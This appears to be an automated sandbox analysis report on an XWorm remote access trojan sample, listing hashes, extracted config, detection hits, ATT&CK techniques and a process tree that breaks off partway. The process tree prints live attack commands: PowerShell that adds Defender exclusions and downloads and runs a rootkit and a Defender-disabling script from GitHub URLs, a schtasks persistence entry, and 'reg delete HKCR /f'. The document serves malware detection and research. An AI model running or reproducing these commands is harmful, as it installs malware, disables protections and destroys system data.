xworm | cb77cc2932fd091798e577cb18708b0ed58bd6c126059fbdb3d6a4024c6a29cc

Analysis

max time kernel
8s
max time network
214s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 13:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperNew.exe
Size

2.9MB
MD5

289c60ad685f6489a427d784e15644ee
SHA1

df342b58f869ba112b25d7200f7d13926157a907
SHA256

cb77cc2932fd091798e577cb18708b0ed58bd6c126059fbdb3d6a4024c6a29cc
SHA512

b7c81d005620cfb0dc05392d40dbd0b3c1cae6c43cac27e5c09491a8be5f6b5eff1c6073e91bd61dac0499240b458b844630a008abc3fc1ab213f36fcc7952f5
SSDEEP

49152:2OTZvMkdOTzwUTZ8TfTuXJj8OtV+RvY/p7msa2aDsKuBGXzOlo3diaf/M9trcVzE:ROkdOTz9Zb+ODEvYR7msaPBu5Adib7r/

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/J42c6s7r

Signatures

Detect Xworm Payload 49 IoCs

resource	yara_rule
behavioral2/files/0x000c000000023b58-4.dat	family_xworm
behavioral2/memory/388-11-0x00000000005E0000-0x00000000005F4000-memory.dmp	family_xworm
behavioral2/memory/388-490-0x000000001C6E0000-0x000000001C6F2000-memory.dmp	family_xworm
behavioral2/memory/6712-2268-0x00000000002B0000-0x00000000002C4000-memory.dmp	family_xworm
behavioral2/memory/2216-2289-0x0000000000670000-0x0000000000684000-memory.dmp	family_xworm
behavioral2/memory/7176-2316-0x0000000000420000-0x0000000000434000-memory.dmp	family_xworm
behavioral2/memory/6896-2381-0x00000000003A0000-0x00000000003B4000-memory.dmp	family_xworm
behavioral2/memory/1832-2412-0x0000000000720000-0x0000000000734000-memory.dmp	family_xworm
behavioral2/memory/7392-2457-0x0000000000A80000-0x0000000000A94000-memory.dmp	family_xworm
behavioral2/memory/7768-2486-0x0000000000FD0000-0x0000000000FE4000-memory.dmp	family_xworm
behavioral2/memory/7368-2638-0x0000000000120000-0x0000000000134000-memory.dmp	family_xworm
behavioral2/memory/2692-2667-0x0000000000990000-0x00000000009A4000-memory.dmp	family_xworm
behavioral2/memory/8048-2743-0x0000000000930000-0x0000000000944000-memory.dmp	family_xworm
behavioral2/memory/3504-2805-0x00000000008C0000-0x00000000008D4000-memory.dmp	family_xworm
behavioral2/memory/6572-2856-0x00000000005B0000-0x00000000005C4000-memory.dmp	family_xworm
behavioral2/memory/6656-2880-0x0000000000250000-0x0000000000264000-memory.dmp	family_xworm
behavioral2/memory/2408-2919-0x0000000000440000-0x0000000000454000-memory.dmp	family_xworm
behavioral2/memory/6124-2940-0x0000000000C20000-0x0000000000C34000-memory.dmp	family_xworm
behavioral2/memory/1532-2994-0x0000000000D40000-0x0000000000D54000-memory.dmp	family_xworm
behavioral2/memory/220-3016-0x00000000000E0000-0x00000000000F4000-memory.dmp	family_xworm
behavioral2/memory/6980-3049-0x0000000000990000-0x00000000009A4000-memory.dmp	family_xworm
behavioral2/memory/5588-3101-0x0000000000F00000-0x0000000000F14000-memory.dmp	family_xworm
behavioral2/memory/5532-3218-0x0000000000780000-0x0000000000794000-memory.dmp	family_xworm
behavioral2/memory/5872-3250-0x0000000000870000-0x0000000000884000-memory.dmp	family_xworm
behavioral2/memory/6948-3269-0x00000000008F0000-0x0000000000904000-memory.dmp	family_xworm
behavioral2/memory/7784-3305-0x00000000007D0000-0x00000000007E4000-memory.dmp	family_xworm
behavioral2/memory/4996-3337-0x0000000000D40000-0x0000000000D54000-memory.dmp	family_xworm
behavioral2/memory/6984-3420-0x0000000000540000-0x0000000000554000-memory.dmp	family_xworm
behavioral2/memory/7528-3439-0x0000000000930000-0x0000000000944000-memory.dmp	family_xworm
behavioral2/memory/6968-3533-0x0000000000BB0000-0x0000000000BC4000-memory.dmp	family_xworm
behavioral2/memory/920-3581-0x0000000000930000-0x0000000000944000-memory.dmp	family_xworm
behavioral2/memory/3900-3638-0x0000000000330000-0x0000000000344000-memory.dmp	family_xworm
behavioral2/memory/6616-3697-0x00000000009C0000-0x00000000009D4000-memory.dmp	family_xworm
behavioral2/memory/1228-3762-0x0000000000400000-0x0000000000414000-memory.dmp	family_xworm
behavioral2/memory/4888-3764-0x0000000000C10000-0x0000000000C24000-memory.dmp	family_xworm
behavioral2/memory/7688-3784-0x0000000000EE0000-0x0000000000EF4000-memory.dmp	family_xworm
behavioral2/memory/5520-3821-0x0000000000480000-0x0000000000494000-memory.dmp	family_xworm
behavioral2/memory/64-3917-0x00000000003C0000-0x00000000003D4000-memory.dmp	family_xworm
behavioral2/memory/5736-3929-0x00000000001C0000-0x00000000001D4000-memory.dmp	family_xworm
behavioral2/memory/6340-3964-0x0000000000E50000-0x0000000000E64000-memory.dmp	family_xworm
behavioral2/memory/6732-4045-0x0000000000700000-0x0000000000714000-memory.dmp	family_xworm
behavioral2/memory/5712-4075-0x0000000000C00000-0x0000000000C14000-memory.dmp	family_xworm
behavioral2/memory/5668-4134-0x0000000000970000-0x0000000000984000-memory.dmp	family_xworm
behavioral2/memory/8180-4172-0x00000000002D0000-0x00000000002E4000-memory.dmp	family_xworm
behavioral2/memory/7724-4199-0x00000000003A0000-0x00000000003B4000-memory.dmp	family_xworm
behavioral2/memory/7600-4229-0x0000000000140000-0x0000000000154000-memory.dmp	family_xworm
behavioral2/memory/6448-4278-0x0000000000DC0000-0x0000000000DD4000-memory.dmp	family_xworm
behavioral2/memory/6380-4311-0x0000000000350000-0x0000000000364000-memory.dmp	family_xworm
behavioral2/memory/7064-4349-0x00000000003D0000-0x00000000003E4000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	3440	powershell.exe
10	3440	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3440	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
10	3440	powershell.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	Shell Infrastructure Host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe

Executes dropped EXE 14 IoCs

pid	Process
388	Shell Infrastructure Host.exe
4276	Shell Infrastructure Host.exe
820	Shell Infrastructure Host.exe
4948	Shell Infrastructure Host.exe
1560	Shell Infrastructure Host.exe
2024	Shell Infrastructure Host.exe
2980	Shell Infrastructure Host.exe
1844	Shell Infrastructure Host.exe
3060	Shell Infrastructure Host.exe
4944	Shell Infrastructure Host.exe
4752	Shell Infrastructure Host.exe
1452	Shell Infrastructure Host.exe
1488	Shell Infrastructure Host.exe
2372	Shell Infrastructure Host.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
13	pastebin.com
14	pastebin.com
19	raw.githubusercontent.com
75	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe
File created	C:\Windows\Shell Infrastructure Host.exe	BootstrapperNew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1840	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5436	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
4260	powershell.exe
3512	powershell.exe
4428	powershell.exe
3512	powershell.exe
3172	powershell.exe
3172	powershell.exe
4260	powershell.exe
4260	powershell.exe
4428	powershell.exe
4428	powershell.exe
3316	powershell.exe
3316	powershell.exe
3440	powershell.exe
3440	powershell.exe
3172	powershell.exe
4540	powershell.exe
4540	powershell.exe
3316	powershell.exe
2692	powershell.exe
2692	powershell.exe
3440	powershell.exe
4660	powershell.exe
4660	powershell.exe
4540	powershell.exe
820	powershell.exe
820	powershell.exe
2692	powershell.exe
4660	powershell.exe
1036	powershell.exe
1036	powershell.exe
1076	powershell.exe
1076	powershell.exe
820	powershell.exe
4948	powershell.exe
4948	powershell.exe
1036	powershell.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	388	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	4276	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	820	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	4948	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	1560	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	2024	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	2980	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	1844	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	3060	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4944	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	820	powershell.exe
Token: SeDebugPrivilege	4752	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	1452	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	1488	Shell Infrastructure Host.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	2372	Shell Infrastructure Host.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 3512	4944	BootstrapperNew.exe	85
PID 4944 wrote to memory of 3512	4944	BootstrapperNew.exe	85
PID 4944 wrote to memory of 3512	4944	BootstrapperNew.exe	85
PID 4944 wrote to memory of 388	4944	BootstrapperNew.exe	87
PID 4944 wrote to memory of 388	4944	BootstrapperNew.exe	87
PID 4944 wrote to memory of 3680	4944	BootstrapperNew.exe	88
PID 4944 wrote to memory of 3680	4944	BootstrapperNew.exe	88
PID 4944 wrote to memory of 3680	4944	BootstrapperNew.exe	88
PID 3680 wrote to memory of 4260	3680	BootstrapperNew.exe	89
PID 3680 wrote to memory of 4260	3680	BootstrapperNew.exe	89
PID 3680 wrote to memory of 4260	3680	BootstrapperNew.exe	89
PID 3680 wrote to memory of 4276	3680	BootstrapperNew.exe	90
PID 3680 wrote to memory of 4276	3680	BootstrapperNew.exe	90
PID 3680 wrote to memory of 4036	3680	BootstrapperNew.exe	92
PID 3680 wrote to memory of 4036	3680	BootstrapperNew.exe	92
PID 3680 wrote to memory of 4036	3680	BootstrapperNew.exe	92
PID 4036 wrote to memory of 4428	4036	BootstrapperNew.exe	93
PID 4036 wrote to memory of 4428	4036	BootstrapperNew.exe	93
PID 4036 wrote to memory of 4428	4036	BootstrapperNew.exe	93
PID 4036 wrote to memory of 820	4036	BootstrapperNew.exe	119
PID 4036 wrote to memory of 820	4036	BootstrapperNew.exe	119
PID 4036 wrote to memory of 4660	4036	BootstrapperNew.exe	115
PID 4036 wrote to memory of 4660	4036	BootstrapperNew.exe	115
PID 4036 wrote to memory of 4660	4036	BootstrapperNew.exe	115
PID 4660 wrote to memory of 3172	4660	BootstrapperNew.exe	97
PID 4660 wrote to memory of 3172	4660	BootstrapperNew.exe	97
PID 4660 wrote to memory of 3172	4660	BootstrapperNew.exe	97
PID 4660 wrote to memory of 4948	4660	BootstrapperNew.exe	131
PID 4660 wrote to memory of 4948	4660	BootstrapperNew.exe	131
PID 4660 wrote to memory of 3696	4660	BootstrapperNew.exe	99
PID 4660 wrote to memory of 3696	4660	BootstrapperNew.exe	99
PID 4660 wrote to memory of 3696	4660	BootstrapperNew.exe	99
PID 3696 wrote to memory of 3316	3696	BootstrapperNew.exe	101
PID 3696 wrote to memory of 3316	3696	BootstrapperNew.exe	101
PID 3696 wrote to memory of 3316	3696	BootstrapperNew.exe	101
PID 3696 wrote to memory of 1560	3696	BootstrapperNew.exe	103
PID 3696 wrote to memory of 1560	3696	BootstrapperNew.exe	103
PID 3696 wrote to memory of 2868	3696	BootstrapperNew.exe	120
PID 3696 wrote to memory of 2868	3696	BootstrapperNew.exe	120
PID 3696 wrote to memory of 2868	3696	BootstrapperNew.exe	120
PID 388 wrote to memory of 3440	388	Shell Infrastructure Host.exe	105
PID 388 wrote to memory of 3440	388	Shell Infrastructure Host.exe	105
PID 2868 wrote to memory of 4540	2868	BootstrapperNew.exe	106
PID 2868 wrote to memory of 4540	2868	BootstrapperNew.exe	106
PID 2868 wrote to memory of 4540	2868	BootstrapperNew.exe	106
PID 2868 wrote to memory of 2024	2868	BootstrapperNew.exe	107
PID 2868 wrote to memory of 2024	2868	BootstrapperNew.exe	107
PID 2868 wrote to memory of 4860	2868	BootstrapperNew.exe	110
PID 2868 wrote to memory of 4860	2868	BootstrapperNew.exe	110
PID 2868 wrote to memory of 4860	2868	BootstrapperNew.exe	110
PID 4860 wrote to memory of 2692	4860	BootstrapperNew.exe	388
PID 4860 wrote to memory of 2692	4860	BootstrapperNew.exe	388
PID 4860 wrote to memory of 2692	4860	BootstrapperNew.exe	388
PID 4860 wrote to memory of 2980	4860	BootstrapperNew.exe	113
PID 4860 wrote to memory of 2980	4860	BootstrapperNew.exe	113
PID 4860 wrote to memory of 4588	4860	BootstrapperNew.exe	299
PID 4860 wrote to memory of 4588	4860	BootstrapperNew.exe	299
PID 4860 wrote to memory of 4588	4860	BootstrapperNew.exe	299
PID 4588 wrote to memory of 4660	4588	BootstrapperNew.exe	115
PID 4588 wrote to memory of 4660	4588	BootstrapperNew.exe	115
PID 4588 wrote to memory of 4660	4588	BootstrapperNew.exe	115
PID 4588 wrote to memory of 1844	4588	BootstrapperNew.exe	495
PID 4588 wrote to memory of 1844	4588	BootstrapperNew.exe	495
PID 4588 wrote to memory of 2076	4588	BootstrapperNew.exe	117

C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4944
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3512
- C:\Windows\Shell Infrastructure Host.exe
  "C:\Windows\Shell Infrastructure Host.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
  - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
      "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
      4⤵
      PID:5196
    - - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        5⤵
        
        PID:3644
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9E92.tmp.bat""
        5⤵
        
        PID:5500
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:1840
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Shell Infrastructure Host" /tr "C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5436
- - C:\Users\Admin\AppData\Local\Temp\MatrixVirus.exe
    "C:\Users\Admin\AppData\Local\Temp\MatrixVirus.exe"
    3⤵
    PID:1240
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
      4⤵
      PID:4072
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete HKCR /f
        5⤵
        
        PID:7516
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4260
- - C:\Windows\Shell Infrastructure Host.exe
    "C:\Windows\Shell Infrastructure Host.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4276
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    3⤵
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4428
  - - C:\Windows\Shell Infrastructure Host.exe
      "C:\Windows\Shell Infrastructure Host.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:820
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      4⤵
      Checks computer location settings
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3172
    - - C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3696
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
